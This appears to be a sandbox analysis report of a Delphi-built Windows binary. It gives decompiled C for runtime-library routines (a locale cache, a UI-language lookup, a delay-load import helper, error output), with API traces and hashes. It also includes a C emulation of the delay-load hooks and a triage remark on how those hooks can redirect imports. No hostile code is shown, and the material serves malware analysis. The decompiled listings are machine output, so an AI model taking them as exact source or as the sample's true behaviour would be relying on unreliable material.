                                                                                    • API String ID: 233154393-2808312488
                                                                                    • Opcode ID: 89dbd54baef797781c63ab5ee0a362cfcea0ac090ff54d53303b749289e312d8
                                                                                    • Instruction ID: 756c878950b08f5201d8436663b045c7a1b9734561897f0b9d621fb0846820d7
                                                                                    • Opcode Fuzzy Hash: 89dbd54baef797781c63ab5ee0a362cfcea0ac090ff54d53303b749289e312d8
                                                                                    • Instruction Fuzzy Hash: 887134387011199BDB05EB67C841BDE76AADF88304F50807BF904AB246DB3DDD82879E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 71%
                                                                                    			// Single-entry cache keyed by LCID and guarded by the critical section at 0x4bdc10: the last LCID is
                                                                                    			// kept at 0x4bdc28 and the string computed for it (0xaa bytes = 0x55 wide chars) at 0x4bdc2a. On a hit
                                                                                    			// the cached string is copied out; on a miss it is recomputed (only if IsValidLocale(..., 2) succeeds,
                                                                                    			// 2 = LCID_SUPPORTED) and stored. Also runtime-library style code rather than sample-specific logic.
                                                                                    			E0040A7E4(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                                    				char _v8;
                                                                                    				void* _t18;
                                                                                    				signed short _t28;
                                                                                    				intOrPtr _t35;
                                                                                    				intOrPtr* _t44;
                                                                                    				intOrPtr _t47;
                                                                                    
                                                                                    				_t42 = __edi;
                                                                                    				_push(0);
                                                                                    				_push(__ebx);
                                                                                    				_push(__esi);
                                                                                    				_t44 = __edx;
                                                                                    				_t28 = __eax;
                                                                                    				_push(_t47);
                                                                                    				_push(0x40a8e8);
                                                                                    				_push( *[fs:eax]);
                                                                                    				 *[fs:eax] = _t47;
                                                                                    				EnterCriticalSection(0x4bdc10);
                                                                                    				if(_t28 !=  *0x4bdc28) {
                                                                                    					LeaveCriticalSection(0x4bdc10);
                                                                                    					E00407A20(_t44);
                                                                                    					if(IsValidLocale(_t28 & 0x0000ffff, 2) != 0) {
                                                                                    						if( *0x4bdc0c == 0) {
                                                                                    							_t18 = E0040A4CC(_t28, _t28, _t44, __edi, _t44);
                                                                                    							L00403738();
                                                                                    							if(_t28 != _t18) {
                                                                                    								if( *_t44 != 0) {
                                                                                    									_t18 = E004086E4(_t44, E0040A900);
                                                                                    								}
                                                                                    								L00403738();
                                                                                    								E0040A4CC(_t18, _t28,  &_v8, _t42, _t44);
                                                                                    								E004086E4(_t44, _v8);
                                                                                    							}
                                                                                    						} else {
                                                                                    							E0040A6C8(_t28, _t44);
                                                                                    						}
                                                                                    					}
                                                                                    					EnterCriticalSection(0x4bdc10);
                                                                                    					 *0x4bdc28 = _t28;
                                                                                    					E0040A34C(0x4bdc2a, E004084EC( *_t44), 0xaa);
                                                                                    					LeaveCriticalSection(0x4bdc10);
                                                                                    				} else {
                                                                                    					E0040858C(_t44, 0x55, 0x4bdc2a);
                                                                                    					LeaveCriticalSection(0x4bdc10);
                                                                                    				}
                                                                                    				_pop(_t35);
                                                                                    				 *[fs:eax] = _t35;
                                                                                    				_push(E0040A8EF);
                                                                                    				return E00407A20( &_v8);
                                                                                    			}

                                                                                    Instruction addresses, one per statement of the listing above, in order: 0x0040a7e4, 0x0040a7e7, 0x0040a7e9, 0x0040a7ea, 0x0040a7eb, 0x0040a7ed, 0x0040a7f1, 0x0040a7f2, 0x0040a7f7, 0x0040a7fa, 0x0040a802, 0x0040a80e, 0x0040a835, 0x0040a83c, 0x0040a84e, 0x0040a857, 0x0040a868, 0x0040a86d, 0x0040a875, 0x0040a87a, 0x0040a883, 0x0040a883, 0x0040a888, 0x0040a890, 0x0040a89a, 0x0040a89a, 0x0040a859, 0x0040a85d, 0x0040a85d, 0x0040a857, 0x0040a8a4, 0x0040a8a9, 0x0040a8c3, 0x0040a8cd, 0x0040a810, 0x0040a81c, 0x0040a826, 0x0040a826, 0x0040a8d4, 0x0040a8d7, 0x0040a8da, 0x0040a8e7

APIs
• EnterCriticalSection.KERNEL32(004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000,00000000), ref: 0040A802
• LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000), ref: 0040A826
• LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000), ref: 0040A835
• IsValidLocale.KERNEL32(00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A847
• EnterCriticalSection.KERNEL32(004BDC10,00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A8A4
• LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A8CD
Strings
Memory Dump Source
• Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
Similarity
• API ID: CriticalSection$Leave$Enter$LocaleValid
• String ID: en-US,en,
• API String ID: 975949045-3579323720
• Opcode ID: e3721d42ea745a9edd8ebaecb4ab5b2828546a05d0e92c0f55165f56426ca85b
• Instruction ID: af4c48ae6f9d4b9345a2e7437780db60bfff4a38cfd5d6d0e3948ff18df55379
• Opcode Fuzzy Hash: e3721d42ea745a9edd8ebaecb4ab5b2828546a05d0e92c0f55165f56426ca85b
• Instruction Fuzzy Hash: 31218461B1031077DA11BB668C03B5E29A89B44705BA0887BB140B32D2EEBD8D52D66F
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 61%
                                                                                    			E0042301C(void* __ebx, void* __esi, void* __eflags) {
                                                                                    				char _v8;
                                                                                    				void* _v12;
                                                                                    				char _v16;
                                                                                    				char _v20;
                                                                                    				intOrPtr* _t21;
                                                                                    				intOrPtr _t61;
                                                                                    				void* _t68;
                                                                                    
                                                                                    				_push(__ebx);
                                                                                    				_v20 = 0;
                                                                                    				_v8 = 0;
                                                                                    				_push(_t68);
                                                                                    				_push(0x423116);
                                                                                    				_push( *[fs:eax]);
                                                                                    				 *[fs:eax] = _t68 + 0xfffffff0;
                                                                                    				_t21 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"GetUserDefaultUILanguage");
                                                                                    				if(_t21 == 0) {
                                                                                    					if(E0041FF2C() != 2) {
                                                                                    						if(E00422FF4(0, L"Control Panel\\Desktop\\ResourceLocale", 0x80000001,  &_v12, 1, 0) == 0) {
                                                                                    							E00422FE8();
                                                                                    							RegCloseKey(_v12);
                                                                                    						}
                                                                                    					} else {
                                                                                    						if(E00422FF4(0, L".DEFAULT\\Control Panel\\International", 0x80000003,  &_v12, 1, 0) == 0) {
                                                                                    							E00422FE8();
                                                                                    							RegCloseKey(_v12);
                                                                                    						}
                                                                                    					}
                                                                                    					E0040873C( &_v20, _v8, 0x42322c);
                                                                                    					E00405920(_v20,  &_v16);
                                                                                    					if(_v16 != 0) {
                                                                                    					}
                                                                                    				} else {
                                                                                    					 *_t21();
                                                                                    				}
                                                                                    				_pop(_t61);
                                                                                    				 *[fs:eax] = _t61;
                                                                                    				_push(E0042311D);
                                                                                    				E00407A20( &_v20);
                                                                                    				return E00407A20( &_v8);
                                                                                    			}


APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00423116), ref: 00423043
  • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00423116), ref: 00423096
Strings
Memory Dump Source
• Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
Similarity
• API ID: AddressCloseHandleModuleProc
• String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
• API String ID: 4190037839-2401316094
• Opcode ID: 0c53a133d6644a1b94ef3c959f72937b5652b11bdcaf1ce6cf384129006bdbe5
• Instruction ID: 05790bdd6973bc135d390eb6e5b6569f0703c8ea8b4006eead18837270f0a894
• Opcode Fuzzy Hash: 0c53a133d6644a1b94ef3c959f72937b5652b11bdcaf1ce6cf384129006bdbe5
• Instruction Fuzzy Hash: 39217930B00228ABDB10EEB5DD42A9F73F4EB44345FA04477A500E3281DB7CAB41962D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 67%
                                                                                    			E0040D218(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                                                                                    				long _v8;
                                                                                    				signed int _v12;
                                                                                    				long _v16;
                                                                                    				void* _v20;
                                                                                    				long _v24;
                                                                                    				intOrPtr _v28;
                                                                                    				intOrPtr _v32;
                                                                                    				intOrPtr _v36;
                                                                                    				intOrPtr _v40;
                                                                                    				intOrPtr _v44;
                                                                                    				struct HINSTANCE__** _v48;
                                                                                    				CHAR* _v52;
                                                                                    				void _v56;
                                                                                    				long _v60;
                                                                                    				_Unknown_base(*)()* _v64;
                                                                                    				struct HINSTANCE__* _v68;
                                                                                    				CHAR* _v72;
                                                                                    				signed int _v76;
                                                                                    				CHAR* _v80;
                                                                                    				intOrPtr* _v84;
                                                                                    				void* _v88;
                                                                                    				void _v92;
                                                                                    				signed int _t104;
                                                                                    				signed int _t106;
                                                                                    				signed int _t108;
                                                                                    				long _t113;
                                                                                    				intOrPtr* _t119;
                                                                                    				void* _t124;
                                                                                    				void _t126;
                                                                                    				long _t128;
                                                                                    				struct HINSTANCE__* _t142;
                                                                                    				long _t166;
                                                                                    				signed int* _t190;
                                                                                    				_Unknown_base(*)()* _t191;
                                                                                    				void* _t194;
                                                                                    				intOrPtr _t196;
                                                                                    
                                                                                    				_push(_a4);
                                                                                    				memcpy( &_v56, 0x4b7c40, 8 << 2);
                                                                                    				_pop(_t194);
                                                                                    				_v56 =  *0x4b7c40;
                                                                                    				_v52 = E0040D6C8( *0x004B7C44);
                                                                                    				_v48 = E0040D6D8( *0x004B7C48);
                                                                                    				_v44 = E0040D6E8( *0x004B7C4C);
                                                                                    				_v40 = E0040D6F8( *0x004B7C50);
                                                                                    				_v36 = E0040D6F8( *0x004B7C54);
                                                                                    				_v32 = E0040D6F8( *0x004B7C58);
                                                                                    				_v28 =  *0x004B7C5C;
                                                                                    				memcpy( &_v92, 0x4b7c60, 9 << 2);
                                                                                    				_t196 = _t194;
                                                                                    				_v88 = 0x4b7c60;
                                                                                    				_v84 = _a8;
                                                                                    				_v80 = _v52;
                                                                                    				if((_v56 & 0x00000001) == 0) {
                                                                                    					_t166 =  *0x4b7c84; // 0x0
                                                                                    					_v8 = _t166;
                                                                                    					_v8 =  &_v92;
                                                                                    					RaiseException(0xc06d0057, 0, 1,  &_v8);
                                                                                    					return 0;
                                                                                    				}
                                                                                    				_t104 = _a8 - _v44;
                                                                                    				_t142 =  *_v48;
                                                                                    				if(_t104 < 0) {
                                                                                    					_t104 = _t104 + 3;
                                                                                    				}
                                                                                    				_v12 = _t104 >> 2;
                                                                                    				_t106 = _v12;
                                                                                    				_t190 = (_t106 << 2) + _v40;
                                                                                    				_t108 = (_t106 & 0xffffff00 | (_t190[0] & 0x00000080) == 0x00000000) & 0x00000001;
                                                                                    				_v76 = _t108;
                                                                                    				if(_t108 == 0) {
                                                                                    					_v72 =  *_t190 & 0x0000ffff;
                                                                                    				} else {
                                                                                    					_v72 = E0040D708( *_t190) + 2;
                                                                                    				}
                                                                                    				_t191 = 0;
                                                                                    				if( *0x4be640 == 0) {
                                                                                    					L10:
                                                                                    					if(_t142 != 0) {
                                                                                    						L25:
                                                                                    						_v68 = _t142;
                                                                                    						if( *0x4be640 != 0) {
                                                                                    							_t191 =  *0x4be640(2,  &_v92);
                                                                                    						}
                                                                                    						if(_t191 != 0) {
                                                                                    							L36:
                                                                                    							if(_t191 == 0) {
                                                                                    								_v60 = GetLastError();
                                                                                    								if( *0x4be644 != 0) {
                                                                                    									_t191 =  *0x4be644(4,  &_v92);
                                                                                    								}
                                                                                    								if(_t191 == 0) {
                                                                                    									_t113 =  *0x4b7c8c; // 0x0
                                                                                    									_v24 = _t113;
                                                                                    									_v24 =  &_v92;
                                                                                    									RaiseException(0xc06d007f, 0, 1,  &_v24);
                                                                                    									_t191 = _v64;
                                                                                    								}
                                                                                    							}
                                                                                    							goto L41;
                                                                                    						} else {
                                                                                    							if( *((intOrPtr*)(_t196 + 0x14)) == 0 ||  *((intOrPtr*)(_t196 + 0x1c)) == 0) {
                                                                                    								L35:
                                                                                    								_t191 = GetProcAddress(_t142, _v72);
                                                                                    								goto L36;
                                                                                    							} else {
                                                                                    								_t119 =  *((intOrPtr*)(_t142 + 0x3c)) + _t142;
                                                                                    								if( *_t119 != 0x4550 ||  *((intOrPtr*)(_t119 + 8)) != _v28 || (( *(_t119 + 0x34) & 0xffffff00 |  *(_t119 + 0x34) == _t142) & 0x00000001) == 0) {
                                                                                    									goto L35;
                                                                                    								} else {
                                                                                    									_t191 =  *((intOrPtr*)(_v36 + _v12 * 4));
                                                                                    									if(_t191 == 0) {
                                                                                    										goto L35;
                                                                                    									}
                                                                                    									L41:
                                                                                    									 *_a8 = _t191;
                                                                                    									goto L42;
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    					if( *0x4be640 != 0) {
                                                                                    						_t142 =  *0x4be640(1,  &_v92);
                                                                                    					}
                                                                                    					if(_t142 == 0) {
                                                                                    						_t142 = LoadLibraryA(_v80);
                                                                                    					}
                                                                                    					if(_t142 != 0) {
                                                                                    						L20:
                                                                                    						if(_t142 == E0040CBA0(_v48, _t142)) {
                                                                                    							FreeLibrary(_t142);
                                                                                    						} else {
                                                                                    							if( *((intOrPtr*)(_t196 + 0x18)) != 0) {
                                                                                    								_t124 = LocalAlloc(0x40, 8);
                                                                                    								_v20 = _t124;
                                                                                    								if(_t124 != 0) {
                                                                                    									 *((intOrPtr*)(_v20 + 4)) = _t196;
                                                                                    									_t126 =  *0x4b7c3c; // 0x0
                                                                                    									 *_v20 = _t126;
                                                                                    									 *0x4b7c3c = _v20;
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    						goto L25;
                                                                                    					} else {
                                                                                    						_v60 = GetLastError();
                                                                                    						if( *0x4be644 != 0) {
                                                                                    							_t142 =  *0x4be644(3,  &_v92); // failure hook, dliFailLoadLib (3): last chance to supply a module before the exception below
                                                                                    						}
                                                                                    						if(_t142 != 0) {
                                                                                    							goto L20;
                                                                                    						} else {
                                                                                    							_t128 =  *0x4b7c88; // 0x0
                                                                                    							_v16 = _t128;
                                                                                    							_v16 =  &_v92;
                                                                                    							RaiseException(0xc06d007e, 0, 1,  &_v16); // VcppException(ERROR_SEVERITY_ERROR, ERROR_MOD_NOT_FOUND): the delay-load "module not found" failure
                                                                                    							return _v64;
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					_t191 =  *0x4be640(0,  &_v92); // notify hook, dliStartProcessing (0): a non-zero return ends the helper with that value
                                                                                    					if(_t191 == 0) {
                                                                                    						goto L10;
                                                                                    					} else {
                                                                                    						L42:
                                                                                    						if( *0x4be640 != 0) {
                                                                                    							_v60 = 0;
                                                                                    							_v68 = _t142;
                                                                                    							_v64 = _t191;
                                                                                    							 *0x4be640(5,  &_v92); // dliNoteEndProcessing (5)
                                                                                    						}
                                                                                    						return _t191;
                                                                                    					}
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0040D2D0
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: ExceptionRaise
                                                                                    • String ID:
                                                                                    • API String ID: 3997070919-0
                                                                                    • Opcode ID: 4fdbadfbff537c598349848257c7330453a14fb024132e1a583ffc8385a63ee1
                                                                                    • Instruction ID: 6bdc8742f8c12d3c05e6aa795b4e0fa0c425ed74332de7fca684440f38d882f1
                                                                                    • Opcode Fuzzy Hash: 4fdbadfbff537c598349848257c7330453a14fb024132e1a583ffc8385a63ee1
                                                                                    • Instruction Fuzzy Hash: 7CA16F75D002089FDB14DFE9D881BAEB7B5BB88300F14423AE505B73C1DB78A949CB59
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
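The fragment above follows the delay-load helper protocol: the notify hook is consulted at dliStartProcessing (0) and dliNotePreLoadLibrary (1), the failure hook at dliFailLoadLib (3), dliNoteEndProcessing (5) closes the call, and RaiseException(0xC06D007E) reports ERROR_MOD_NOT_FOUND when no module could be obtained. The following is an added example, not code from the sample, the sandbox or any runtime library: a portable C emulation of that control flow, so each path can be exercised against a constructed module table. `fake_load_library`, the two hook functions and the module names are assumptions made for the example; the interlocked handle store, the FreeLibrary of a duplicate handle and the unload-list bookkeeping of the original are left out.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Delay-load notification codes; MSVC delayimp.h and Delphi SysInit use the same values. */
enum {
    DLI_START_PROCESSING    = 0,   /* hook(0) in the fragment */
    DLI_NOTE_PRE_LOADLIB    = 1,   /* hook(1) */
    DLI_FAIL_LOADLIB        = 3,   /* failure hook(3) */
    DLI_NOTE_END_PROCESSING = 5    /* hook(5) */
};

/* VcppException(ERROR_SEVERITY_ERROR, ERROR_MOD_NOT_FOUND): the status the
   fragment passes to RaiseException when no module could be obtained. */
#define DELAYLOAD_MOD_NOT_FOUND 0xC06D007Eu

typedef struct {
    const char *dll_name;    /* _v80: the name handed to LoadLibraryA */
    void       *hmod;        /* resolved module, set on success */
    uint32_t    last_error;  /* _v60: GetLastError() after a failed load */
} DelayLoadInfo;

/* A hook returns a non-NULL module to override the helper at that step. */
typedef void *(*DelayLoadHook)(unsigned notification, DelayLoadInfo *dli);

/* Constructed stand-in for LoadLibraryA: one known "module", nothing else. */
static int fake_kernel32, substitute_module;
static void *fake_load_library(const char *name, uint32_t *err) {
    if (strcmp(name, "kernel32.dll") == 0) return &fake_kernel32;
    *err = 126;  /* ERROR_MOD_NOT_FOUND */
    return NULL;
}

/* The two hook slots, as at 0x4be640 (notify) and 0x4be644 (failure) in the sample. */
static DelayLoadHook g_notify_hook  = NULL;
static DelayLoadHook g_failure_hook = NULL;

/* Returns 0 with dli->hmod set, or DELAYLOAD_MOD_NOT_FOUND where the sample raises. */
uint32_t delay_load_module(DelayLoadInfo *dli) {
    void *h = NULL;
    /* hook(0): a non-zero result from dliStartProcessing is the final answer;
       only the end-processing notification follows (the L42 path). */
    if (g_notify_hook && (h = g_notify_hook(DLI_START_PROCESSING, dli)) != NULL) {
        dli->hmod = h;
        g_notify_hook(DLI_NOTE_END_PROCESSING, dli);
        return 0;
    }
    /* hook(1): dliNotePreLoadLibrary may hand back a module; otherwise load it. */
    if (g_notify_hook)
        h = g_notify_hook(DLI_NOTE_PRE_LOADLIB, dli);
    if (h == NULL)
        h = fake_load_library(dli->dll_name, &dli->last_error);
    /* hook(3): dliFailLoadLib gets the last word before the exception. */
    if (h == NULL && g_failure_hook)
        h = g_failure_hook(DLI_FAIL_LOADLIB, dli);
    if (h == NULL)
        return DELAYLOAD_MOD_NOT_FOUND;
    dli->hmod = h;
    if (g_notify_hook)
        g_notify_hook(DLI_NOTE_END_PROCESSING, dli);
    return 0;
}

/* Two constructed hooks. Either makes the helper accept a module that the
   loader never produced, which is why these two slots matter to an analyst. */
static void *redirecting_hook(unsigned n, DelayLoadInfo *dli) {
    (void)dli;
    return n == DLI_NOTE_PRE_LOADLIB ? &substitute_module : NULL;
}
static void *fallback_hook(unsigned n, DelayLoadInfo *dli) {
    (void)dli;
    return n == DLI_FAIL_LOADLIB ? &substitute_module : NULL;
}
void install_redirecting_hook(void) { g_notify_hook = redirecting_hook; }
void install_fallback_hook(void)    { g_failure_hook = fallback_hook; }
void clear_hooks(void)              { g_notify_hook = NULL; g_failure_hook = NULL; }

/* Wrappers so each path can be checked by name. */
uint32_t load_status(const char *name) {
    DelayLoadInfo d = { name, NULL, 0 };
    return delay_load_module(&d);
}
const void *load_handle(const char *name) {
    DelayLoadInfo d = { name, NULL, 0 };
    return delay_load_module(&d) == 0 ? d.hmod : NULL;
}
int handle_is_fake_kernel32(const void *h) { return h == &fake_kernel32; }
int handle_is_substitute(const void *h)    { return h == &substitute_module; }

int main(void) {
    printf("kernel32.dll: 0x%08X\n", (unsigned)load_status("kernel32.dll"));
    printf("missing.dll:  0x%08X\n", (unsigned)load_status("missing.dll"));
    install_fallback_hook();
    printf("missing.dll with failure hook: 0x%08X\n", (unsigned)load_status("missing.dll"));
    clear_hooks();
    return 0;
}
```

When triaging a binary that exposes these hook slots, the redirecting case is the one to look for: a hook that answers at notification 1 or 3 decides which module backs the import, and the helper itself never calls the loader for it.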

                                                                                    C-Code - Quality: 72%
                                                                                    			E004047B0(int __eax, void* __ecx, void* __edx) {
                                                                                    				long _v12;
                                                                                    				int _t4;
                                                                                    				long _t7;
                                                                                    				void* _t11;
                                                                                    				long _t12;
                                                                                    				void* _t13;
                                                                                    				long _t18;
                                                                                    
                                                                                    				_t4 = __eax;
                                                                                    				_t24 = __edx;
                                                                                    				_t20 = __eax;
                                                                                    				if( *0x4bb058 == 0) { // console flag (read via 0x4ba6c0 in E0041F0F4 as well): 0 selects the message-box path, non-zero writes to stderr
                                                                                    					_push(0x2010); // MB_ICONERROR | MB_TASKMODAL
                                                                                    					_push(__edx);
                                                                                    					_push(__eax);
                                                                                    					_push(0);
                                                                                    					L00403780();
                                                                                    				} else {
                                                                                    					_t7 = E00407EF0(__edx);
                                                                                    					WriteFile(GetStdHandle(0xfffffff4), _t24, _t7,  &_v12, 0); // 0xfffffff4 = STD_ERROR_HANDLE (-12)
                                                                                    					_t11 =  *0x4b7078; // 0x403920
                                                                                    					_t12 = E00407EF0(_t11);
                                                                                    					_t13 =  *0x4b7078; // 0x403920
                                                                                    					WriteFile(GetStdHandle(0xfffffff4), _t13, _t12,  &_v12, 0);
                                                                                    					_t18 = E00407EF0(_t20);
                                                                                    					_t4 = WriteFile(GetStdHandle(0xfffffff4), _t20, _t18,  &_v12, 0);
                                                                                    				}
                                                                                    				return _t4;
                                                                                    			}

                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047D2
                                                                                    • WriteFile.KERNEL32(00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047D8
                                                                                    • GetStdHandle.KERNEL32(000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047F7
                                                                                    • WriteFile.KERNEL32(00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047FD
                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?), ref: 00404814
                                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000), ref: 0040481A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: FileHandleWrite
                                                                                    • String ID: 9@
                                                                                    • API String ID: 3320372497-3209974744
                                                                                    • Opcode ID: 5f8d133322f34133c732956f1222a9d0eafcb790ac979970e9ef56a2ae19cd1b
                                                                                    • Instruction ID: 9b3b4e35e49a927b8991458b20a1a8ec0ccf5b925403b1971dfbe1b0899ab5f0
                                                                                    • Opcode Fuzzy Hash: 5f8d133322f34133c732956f1222a9d0eafcb790ac979970e9ef56a2ae19cd1b
                                                                                    • Instruction Fuzzy Hash: 2001AEE25492103DE110F7A69C85F57168C8B4472AF10467F7218F35D2C9395D44927E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 62%
                                                                                    			E0041F0F4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                    				char* _v8;
                                                                                    				long _v12;
                                                                                    				short _v140;
                                                                                    				short _v2188;
                                                                                    				void* _t15;
                                                                                    				char* _t17;
                                                                                    				intOrPtr _t19;
                                                                                    				intOrPtr _t30;
                                                                                    				long _t48;
                                                                                    				intOrPtr _t56;
                                                                                    				intOrPtr _t57;
                                                                                    				int _t61;
                                                                                    				void* _t64;
                                                                                    
                                                                                    				_push(__ebx);
                                                                                    				_push(__esi);
                                                                                    				_v8 = 0;
                                                                                    				_push(_t64);
                                                                                    				_push(0x41f219);
                                                                                    				_push( *[fs:ecx]);
                                                                                    				 *[fs:ecx] = _t64 + 0xfffff778;
                                                                                    				_t61 = E0041EEFC(_t15, __ebx,  &_v2188, __edx, __edi, __esi, 0x400);
                                                                                    				_t17 =  *0x4ba6c0; // 0x4bb058
                                                                                    				if( *_t17 == 0) { // same console flag as in E004047B0: 0 selects MessageBoxW, non-zero writes to stderr
                                                                                    					_t19 =  *0x4ba4f8; // 0x40e710
                                                                                    					_t11 = _t19 + 4; // 0xffed
                                                                                    					LoadStringW(E00409FF0( *0x4be634),  *_t11,  &_v140, 0x40); // caption from string resource 0xffed, at most 0x40 WCHARs
                                                                                    					MessageBoxW(0,  &_v2188,  &_v140, 0x2010); // 0x2010 = MB_TASKMODAL | MB_ICONSTOP (type bits 0 = MB_OK)
                                                                                    				} else {
                                                                                    					_t30 =  *0x4ba524; // 0x4bb340
                                                                                    					E00405564(E00405820(_t30));
                                                                                    					_t48 = WideCharToMultiByte(1, 0,  &_v2188, _t61, 0, 0, 0, 0); // code page 1 = CP_OEMCP; no output buffer, so this call only returns the required size
                                                                                    					_push(_t48);
                                                                                    					E00409C00();
                                                                                    					WideCharToMultiByte(1, 0,  &_v2188, _t61, _v8, _t48, 0, 0); // second call performs the conversion into _v8
                                                                                    					WriteFile(GetStdHandle(0xfffffff4), _v8, _t48,  &_v12, 0); // 0xfffffff4 = (DWORD)-12 = STD_ERROR_HANDLE
                                                                                    					WriteFile(GetStdHandle(0xfffffff4), 0x41f234, 2,  &_v12, 0); // two-byte line terminator stored at 0x41f234
                                                                                    				}
                                                                                    				_pop(_t56);
                                                                                    				 *[fs:eax] = _t56;
                                                                                    				_push(0x41f220);
                                                                                    				_t57 =  *0x41f0c4; // 0x41f0c8
                                                                                    				return E00409D24( &_v8, _t57);
                                                                                    			}

                                                                                    Instruction addresses shown in the graph view for this function: 0x0041f0fd, 0x0041f0fe, 0x0041f101, 0x0041f106, 0x0041f107, 0x0041f10c, 0x0041f10f, 0x0041f122, 0x0041f124, 0x0041f12c, 0x0041f1ca, 0x0041f1cf, 0x0041f1de, 0x0041f1f8, 0x0041f132, 0x0041f132, 0x0041f13c, 0x0041f15a, 0x0041f15c, 0x0041f16b, 0x0041f188, 0x0041f1a0, 0x0041f1ba, 0x0041f1ba, 0x0041f1ff, 0x0041f202, 0x0041f205, 0x0041f20d, 0x0041f218

                                                                                    APIs
                                                                                      • Part of subcall function 0041EEFC: VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F
                                                                                      • Part of subcall function 0041EEFC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF53
                                                                                      • Part of subcall function 0041EEFC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF6E
                                                                                      • Part of subcall function 0041EEFC: LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 0041F009
                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,0041F219), ref: 0041F155
